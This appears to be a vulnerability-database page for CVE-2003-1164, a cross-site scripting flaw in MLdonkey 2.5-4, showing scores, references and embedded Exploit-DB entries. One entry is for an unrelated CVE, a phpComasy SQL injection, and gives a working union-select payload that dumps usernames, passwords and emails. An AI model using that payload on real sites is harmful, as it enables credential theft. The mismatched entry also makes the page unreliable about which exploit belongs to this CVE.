CVE-2003-1164
published 2003-12-31CVE-2003-1164: Cross-site scripting (XSS) vulnerability in Mldonkey 2.5-4 allows remote attackers to inject arbitrary web script or HTML via the URI, which is injected into…
PriorityP417medium4.3CVSS 2.0
AVNACMAuNCNIPAN
EXPLOIT
EPSS
1.79%
75.7th percentile
Cross-site scripting (XSS) vulnerability in Mldonkey 2.5-4 allows remote attackers to inject arbitrary web script or HTML via the URI, which is injected into the HTML error page.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| mldonkey | mldonkey | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
phpComasy 0.8 - 'mod_project_id' SQL Injection
exploitdb·2008-03-01
CVE-2008-1164 phpComasy 0.8 - 'mod_project_id' SQL Injection
phpComasy 0.8 - 'mod_project_id' SQL Injection
---
By Cr@zy_King / [email protected]
phpComasy 0.8 (mod_project_id) Remote Sql İnj. Vuln
Script Down : http://www.phpcomasy.com/index.php?id=7&mod_action=project_detail&mod_project_id=9
Page : index.php?id=7&mod_action=project_detail&mod_project_id=Sql.
Exp : -9+union+select+1,2,concat(username,0x3a,password,0x3a,email),4,5,6,7+from+user
Not : Hiçkimse Kendini pahalı Zannetmesin Hepinizin İndirim Gününü Biliyorum ;)
Hackshow.us / Hack Bir Showdur.
Greatz : Eno7 - Crackers_Child - Thehacker - Ghost61 - Tilkiandre - Edoras - The_Bekir - DreamTurk
Special Greatz : str0ke and SuSkun (since 2003 :) HoÅŸgeldin Suskun Abi.
# milw0rm.com [2008-03-01]
Exploit-DB
MLdonkey 2.5-4 - Cross-Site Scripting
exploitdb·2003-10-31
CVE-2003-1164 MLdonkey 2.5-4 - Cross-Site Scripting
MLdonkey 2.5-4 - Cross-Site Scripting
---
source: https://www.securityfocus.com/bid/8946/info
It has been reported that the Mldonkey web interface is prone to cross-site scripting attacks when reporting errors. The problem occurs due to insufficient sanitization of script code within requests. This could potentially allow an attacker to carry out a variety of attacks on a user.
http://127.0.0.1:4080/...
No writeups or analysis indexed.
http://lists.grok.org.uk/pipermail/full-disclosure/2003-October/013070.htmlhttp://secunia.com/advisories/10134http://www.securityfocus.com/bid/8946https://exchange.xforce.ibmcloud.com/vulnerabilities/13615http://lists.grok.org.uk/pipermail/full-disclosure/2003-October/013070.htmlhttp://secunia.com/advisories/10134http://www.securityfocus.com/bid/8946https://exchange.xforce.ibmcloud.com/vulnerabilities/13615
2003-12-31
Published